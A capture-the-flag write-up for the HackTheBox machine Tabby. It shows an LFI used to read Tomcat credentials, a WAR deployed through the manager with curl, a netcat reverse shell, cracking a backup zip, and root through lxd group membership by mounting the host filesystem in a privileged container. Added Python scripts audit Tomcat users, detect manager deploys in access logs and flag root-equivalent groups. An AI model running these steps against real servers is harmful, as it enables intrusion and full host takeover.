TABBY HACKTHEBOX WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 22:45 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 22:45
    Completed NSE at 22:45, 0.00s elapsed
    Initiating NSE at 22:45
    Completed NSE at 22:45, 0.00s elapsed
    Initiating NSE at 22:45
    Completed NSE at 22:45, 0.00s elapsed
    Initiating Ping Scan at 22:45
    Scanning 10.10.10.194 [4 ports]
    Completed Ping Scan at 22:45, 0.56s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 22:45
    Scanning tabby.htb (10.10.10.194) [1000 ports]
    Discovered open port 22/tcp on 10.10.10.194
    Discovered open port 80/tcp on 10.10.10.194
    Discovered open port 8080/tcp on 10.10.10.194
    Completed SYN Stealth Scan at 22:45, 2.73s elapsed (1000 total ports)
    Initiating Service scan at 22:45
    Scanning 3 services on tabby.htb (10.10.10.194)
    Completed Service scan at 22:45, 7.34s elapsed (3 services on 1 host)
    Initiating OS detection (try #1) against tabby.htb (10.10.10.194)
    Retrying OS detection (try #2) against tabby.htb (10.10.10.194)
    Initiating Traceroute at 22:45
    Completed Traceroute at 22:45, 6.34s elapsed
    NSE: Script scanning 10.10.10.194.
    Initiating NSE at 22:45
    Completed NSE at 22:45, 8.54s elapsed
    Initiating NSE at 22:45
    Completed NSE at 22:46, 2.00s elapsed
    Initiating NSE at 22:46
    Completed NSE at 22:46, 0.00s elapsed
    Nmap scan report for tabby.htb (10.10.10.194)
    Host is up (0.42s latency).
    Not shown: 802 closed ports, 195 filtered ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Mega Hosting
    8080/tcp open  http    Apache Tomcat
    | http-methods: 
    |_  Supported Methods: OPTIONS GET HEAD POST
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-title: Apache Tomcat
    Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 21 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 995/tcp)
    HOP RTT       ADDRESS
    1   ... 20
    21  284.13 ms tabby.htb (10.10.10.194)

    NSE: Script Post-scanning.
    Initiating NSE at 22:46
    Completed NSE at 22:46, 0.00s elapsed
    Initiating NSE at 22:46
    Completed NSE at 22:46, 0.00s elapsed
    Initiating NSE at 22:46
    Completed NSE at 22:46, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 34.56 seconds
            Raw packets sent: 1560 (72.546KB) | Rcvd: 837 (34.270KB)

WEBSITE ENUMERATION

PORT 80

PORT 8080

Port 8080 is running Tomcat, whose manager application needs a username and password, which we don't have yet.

So let's look at the Mega Hosting site on port 80.

After searching for an exploit for it I did not find a working one, but I did learn that the site has an LFI.

The news section is where the LFI is.

After trying log poisoning through it, I found that it does not give us RCE.

GETTING PASSWORDS FOR TOMCAT WEBSITE

We have an LFI, and we can use it to read the Tomcat password.

First we need to understand Tomcat's directory structure:

https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory

https://mkyong.com/tomcat/tomcat-default-administrator-password/#:~:text=1.,access%20the%20Tomcat%20manager%20page.

I recommend downloading Tomcat to check its file structure yourself.

After going through that directory I got the Tomcat password.
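The password came out of Tomcat's own user file, so the defensive lesson is about what that file grants and who can read it. Below is an added Python audit (my example, not code from the write-up or from Tomcat) that parses a tomcat-users.xml, reports every account holding a deploy- or admin-capable role, and checks whether the file is readable by other users on the host. The XML content and passwords are constructed placeholders, not the box's file.

```python
"""Audit a tomcat-users.xml for deploy-capable accounts and loose file permissions."""
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Constructed sample, not the file from the box; passwords are placeholders.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="PLACEHOLDER_PASSWORD" roles="admin-gui,manager-script"/>
  <user username="viewer" password="PLACEHOLDER_PASSWORD_2" roles="manager-status"/>
</tomcat-users>
"""

# Roles that let an account deploy code or change server configuration.
HIGH_RISK_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}


def manager_accounts(xml_text):
    """Return {username: [high-risk roles]} for every user holding a deploy/admin role."""
    root = ET.fromstring(xml_text)
    findings = {}
    for elem in root.iter():
        # Strip the namespace so the check works with or without xmlns.
        if elem.tag.split("}")[-1] != "user":
            continue
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        risky = sorted(roles & HIGH_RISK_ROLES)
        if risky:
            findings[elem.get("username")] = risky
    return findings


def world_readable(path):
    """True if the 'other' read bit is set, i.e. any local account (or an LFI running as
    the web server user) can read the credentials."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit(path):
    """Audit a tomcat-users.xml on disk: risky accounts plus file-permission exposure."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return {"accounts": manager_accounts(text), "world_readable": world_readable(path)}


def audit_sample(mode=0o644):
    """Write the constructed sample to a temp file with the given mode and audit it."""
    fd, path = tempfile.mkstemp(suffix=".xml")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_TOMCAT_USERS)
    os.chmod(path, mode)
    try:
        return audit(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for mode in (0o644, 0o640):
        result = audit_sample(mode)
        print(f"mode {oct(mode)}: world-readable={result['world_readable']} "
              f"risky accounts={result['accounts']}")
```

Run it against a real install with `audit("/etc/tomcat9/tomcat-users.xml")` (path is the Debian/Ubuntu default and an assumption for other layouts). The two things worth fixing when it reports them are any `manager-script`/`manager-gui` account that is not strictly needed, and a mode that lets accounts outside the tomcat group read the file.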

Now let's get our shell,

which was not that easy, as I had to google and take help from forums.

There is no upload area in the interface, so we have to upload using curl and wget.

Please read the Apache Tomcat 9 documentation on deploying applications with the manager.

    curl -v -u tomcat:****************** -T test.war 'http://10.10.10.194:8080/manager/text/deploy?path=/test&update=true'

Then we can access it using:

http://tabby.htb:8080/manager/text/list

http://tabby.htb:8080/manager/text/start?path=/test.test

http://tabby.htb:8080/test.test

    ┌─[root@liquid]─[~/Desktop/HTB/tabby]
    └──╼ #nc -lnvp 9001
    listening on [any] 9001 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.194] 40170
    python3 -c 'import pty;pty.spawn("/bin/bash")'
    tomcat@tabby:/var/lib/tomcat9$
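From the blue-team side, every step above leaves a line in Tomcat's access log, so it is a good place to detect a WAR deploy through the manager. The following Python script is an added example (mine, not the write-up's and not part of Tomcat) that parses access-log lines in the default "common" AccessLogValve pattern, rates successful remote hits on the manager's deploy/start/stop endpoints as high, other remote manager use as medium, failed manager logins as low, and also flags the first requests to any context path that a logged deploy created. The log lines are constructed to mirror the session in this post; the timestamps are made up.

```python
"""Flag Tomcat manager deployment activity in access-log lines (common log format)."""
import re
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Constructed sample in Tomcat's default "common" access-log pattern, not a real log.
SAMPLE_LOG = """\
10.10.14.12 - - [21/Jun/2020:17:02:11 +0000] "GET / HTTP/1.1" 200 1895
10.10.14.12 - tomcat [21/Jun/2020:17:03:40 +0000] "PUT /manager/text/deploy?path=/test&update=true HTTP/1.1" 200 58
10.10.14.12 - tomcat [21/Jun/2020:17:03:55 +0000] "GET /manager/text/list HTTP/1.1" 200 142
10.10.14.12 - tomcat [21/Jun/2020:17:04:02 +0000] "GET /test/ HTTP/1.1" 200 0
127.0.0.1 - tomcat [21/Jun/2020:17:10:00 +0000] "GET /manager/text/list HTTP/1.1" 200 142
10.10.14.12 - - [21/Jun/2020:17:11:00 +0000] "GET /manager/html HTTP/1.1" 401 2473
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that change what the server runs.
CHANGE_ENDPOINTS = ("/manager/text/deploy", "/manager/text/undeploy",
                    "/manager/text/start", "/manager/text/stop", "/manager/html/upload")


def parse_line(line):
    """Parse one common-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def is_remote(ip):
    """Treat anything that is not a loopback address (or is unparseable) as remote."""
    try:
        return not ip_address(ip).is_loopback
    except ValueError:
        return True


def classify(entry, deployed):
    """Return 'high', 'medium', 'low' or None; records deployed context paths as a side effect."""
    split = urlsplit(entry["path"])
    path, query = split.path, parse_qs(split.query)
    ok, remote = entry["status"] == 200, is_remote(entry["ip"])
    if path.startswith("/manager/"):
        if entry["status"] in (401, 403):
            return "low"            # failed authentication against the manager
        if ok and remote and any(path.startswith(e) for e in CHANGE_ENDPOINTS):
            if path == "/manager/text/deploy":
                for ctx in query.get("path", []):
                    deployed.add(ctx.rstrip("/") or "/")
            return "high"           # remote, successful change to deployed apps
        if ok and remote:
            return "medium"         # remote read-only manager use (e.g. list)
        return None
    for ctx in deployed:
        if path == ctx or path.startswith(ctx + "/"):
            return "high"           # traffic to an application a logged deploy created
    return None


def scan(text):
    """Return [(severity, ip, user, method, path)] for suspicious lines, in log order."""
    deployed, findings = set(), []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        sev = classify(entry, deployed)
        if sev:
            findings.append((sev, entry["ip"], entry["user"], entry["method"], entry["path"]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

Point it at a real file with `scan(open("/var/log/tomcat9/localhost_access_log.2020-06-21.txt").read())` (that path is the Debian/Ubuntu default, an assumption for other layouts). The loopback exemption encodes the usual hardening of binding the manager to localhost; if your manager is exposed on purpose, drop the `remote` condition and rely on the user and source-address allow-list instead.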

GETTING USER ACCESS

Let's download linpeas to our shell.

After downloading it and running it from the tmp directory, we found an archive owned by ash, which looks interesting.

So let's get that to our local machine:

    ┌─[root@liquid]─[~/Desktop/HTB/tabby]
    └──╼ #ls
    16162020_backup.zip  liquid.war

Unzipping it needs a password, so let's crack it using fcrackzip:

    ┌─[root@liquid]─[~/Desktop/HTB/tabby]
    └──╼ #fcrackzip -D -p ../../THM/Wordlists/rockyou.txt 16162020_backup.zip 
    possible pw found: ******** ()

After enumerating through the files I got nothing, so I used this password to su to ash.

Here we go with our user ash:

    ash@tabby:~$ id
    uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)

GETTING ROOT ACCESS

Let's start with our usual commands:

    ash@tabby:~$ id
    uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
    ash@tabby:~$ sudo -l
    sudo: unable to open /run/sudo/ts/ash: Read-only file system
    [sudo] password for ash: 
    Sorry, user ash may not run sudo on tabby.
    ash@tabby:~$ 

But the LXD group looks suspicious.

So let's google it.

Here we learn that we could privesc using it:

https://www.hackingarticles.in/lxd-privilege-escalation/

https://book.hacktricks.xyz/linux-unix/privilege-escalation/lxd-privilege-escalation

So just follow all these steps.

One thing that took me 3 hours to figure out: do this from ash's home directory, not from /tmp.

It was not working for me from /tmp, so I tried it from ash's directory instead.

FROM YOUR MACHINE

    ┌─[root@liquid]─[~/Desktop/HTB/tabby/lxd-alpine-builder]
    └──╼ #ls -l
    total 3180
    -rw-r--r-- 1 root root 3212312 Jun 21 22:04 alpine-v3.12-x86_64-20200621_2204.tar.gz
    -rwxr-xr-x 1 root root    7498 Jun 21 22:03 build-alpine
    -rw-r--r-- 1 root root   26530 Jun 21 22:03 LICENSE
    -rw-r--r-- 1 root root     768 Jun 21 22:03 README.md
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/tabby/lxd-alpine-builder]
    └──╼ #python -m SimpleHTTPServer 
    Serving HTTP on 0.0.0.0 port 8000 ...

FROM ASH’S MACHINE

    ash@tabby:~$ wget http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
    --2020-06-21 17:20:54--  http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
    Connecting to 10.10.14.12:8000... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3212312 (3.1M) [application/gzip]
    Saving to: ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’

    alpine-v3.12-x86_64 100%[===================>]   3.06M  67.4KB/s    in 45s     

    2020-06-21 17:21:39 (70.2 KB/s) - ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’ saved [3212312/3212312]

    ash@tabby:~$ lxc image import ./alpine-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
    If this is your first time running LXD on this machine, you should also run: lxd init
    To start your first instance, try: lxc launch ubuntu:18.04

    ash@tabby:~$ lxc image list
    +--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
    | ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          | ARCHITECTURE |   TYPE    |  SIZE  |         UPLOAD DATE          |
    +--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
    | liquid | 1145f55bb6a7 | no     | alpine v3.12 (20200621_22:04) | x86_64       | CONTAINER | 3.06MB | Jun 21, 2020 at 5:21pm (UTC) |
    +--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+

Here you may encounter this error:

Error: No storage pool found. Please create a new storage pool

https://techoverflow.net/2018/05/03/how-to-fix-lxd-failed-container-creation-no-storage-pool-found-please-create-a-new-storage-pool/

    ash@tabby:~$ lxd init
    Would you like to use LXD clustering? (yes/no) [default=no]: no
    Do you want to configure a new storage pool? (yes/no) [default=yes]: no
    Would you like to connect to a MAAS server? (yes/no) [default=no]: ^C
    ash@tabby:~$ lxd init
    Would you like to use LXD clustering? (yes/no) [default=no]: no
    Do you want to configure a new storage pool? (yes/no) [default=yes]: yes
    Name of the new storage pool [default=default]: 
    Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: dir
    Would you like to connect to a MAAS server? (yes/no) [default=no]: no
    Would you like to create a new local network bridge? (yes/no) [default=yes]: 
    What should the new bridge be called? [default=lxdbr0]: 
    The requested network bridge "lxdbr0" already exists. Please choose another name.
    What should the new bridge be called? [default=lxdbr0]: 
    The requested network bridge "lxdbr0" already exists. Please choose another name.
    What should the new bridge be called? [default=lxdbr0]: liquid
    What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
    What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
    Would you like LXD to be available over the network? (yes/no) [default=no]: 
    Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
    Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 

THEN JUST CONTINUE WITH YOUR COMMANDS:

    ash@tabby:~$ lxc init liquid privesc -c security.privileged=true
    Creating privesc
    ash@tabby:~$ lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
    Device mydevice added to privesc
    ash@tabby:~$ ^C
    ash@tabby:~$ lxc start privesc
    ash@tabby:~$ lxc exec privesc /bin/sh
    ~ # id
    uid=0(root) gid=0(root)
    ~ # cd /mnt/root
    /mnt/root # ls
    bin         home        lost+found  root        swap.img
    boot        lib         media       run         sys
    cdrom       lib32       mnt         sbin        tmp
    dev         lib64       opt         snap        usr
    etc         libx32      proc        srv         var
    /mnt/root # cd root
    /mnt/root/root # wc -c root.txt
    33 root.txt
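The root cause here is not a bug in LXD but group membership: anyone in `lxd` can create a privileged container with the host's root filesystem mounted, which is effectively root. A quick audit that catches this on a host is the Python script below, an added example of mine rather than anything from the write-up or from LXD. It parses `/etc/group` and the one-line output of `id` (the constructed samples mirror ash's groups from this post) and reports which users sit in groups that are equivalent to root; the group list and reasons are my assumptions about common Linux setups.

```python
"""Flag local accounts whose supplementary groups are equivalent to root access."""
import re

# Constructed /etc/group excerpt modelled on the `id` output in the write-up; not the box's file.
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog,ash
cdrom:x:24:ash
sudo:x:27:
dip:x:30:ash
plugdev:x:46:ash
lxd:x:116:ash
tomcat:x:998:
ash:x:1000:
"""

# The `id` line from the write-up, used as a second input format.
SAMPLE_ID_OUTPUT = ("uid=1000(ash) gid=1000(ash) "
                    "groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)")

# Groups whose membership gives root-equivalent power (assumed list, not exhaustive).
ROOT_EQUIVALENT = {
    "lxd": "can launch privileged containers with the host filesystem mounted",
    "docker": "can run containers with host mounts and host privileges",
    "sudo": "sudo access (intended, but still worth listing)",
    "wheel": "sudo/su access on RHEL-style systems",
    "disk": "raw read/write access to block devices",
}


def parse_group(text):
    """Parse /etc/group content into {group_name: [members]}; skips blanks and comments."""
    members = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, _gid, member_field = line.split(":", 3)
        members[name] = [m for m in member_field.split(",") if m]
    return members


def root_equivalent_members(group_text):
    """Return {user: [root-equivalent groups]} from /etc/group content."""
    groups = parse_group(group_text)
    findings = {}
    for gname in ROOT_EQUIVALENT:
        for user in groups.get(gname, []):
            findings.setdefault(user, []).append(gname)
    return {u: sorted(g) for u, g in findings.items()}


def groups_from_id_output(id_output):
    """Extract group names from a `groups=100(a),4(b)` style `id` line."""
    m = re.search(r"groups=(\S+)", id_output)
    if not m:
        return []
    return re.findall(r"\d+\(([^)]+)\)", m.group(1))


def flag_id_output(id_output):
    """Return the root-equivalent groups present in one `id` line, sorted."""
    return sorted(set(groups_from_id_output(id_output)) & set(ROOT_EQUIVALENT))


def report(group_text):
    """Human-readable lines, one per finding, with the reason each group matters."""
    lines = []
    for user, gnames in sorted(root_equivalent_members(group_text).items()):
        for g in gnames:
            lines.append(f"{user}: member of {g} ({ROOT_EQUIVALENT[g]})")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_GROUP)))
    print("from id output:", flag_id_output(SAMPLE_ID_OUTPUT))
```

On a live host, feed it `open("/etc/group").read()`. The fix for a finding like ash's is simply `gpasswd -d ash lxd` (or `deluser ash lxd` on Debian-based systems) plus restricting LXD's socket to administrators, since no amount of sudo hardening helps while that group membership stands.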

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
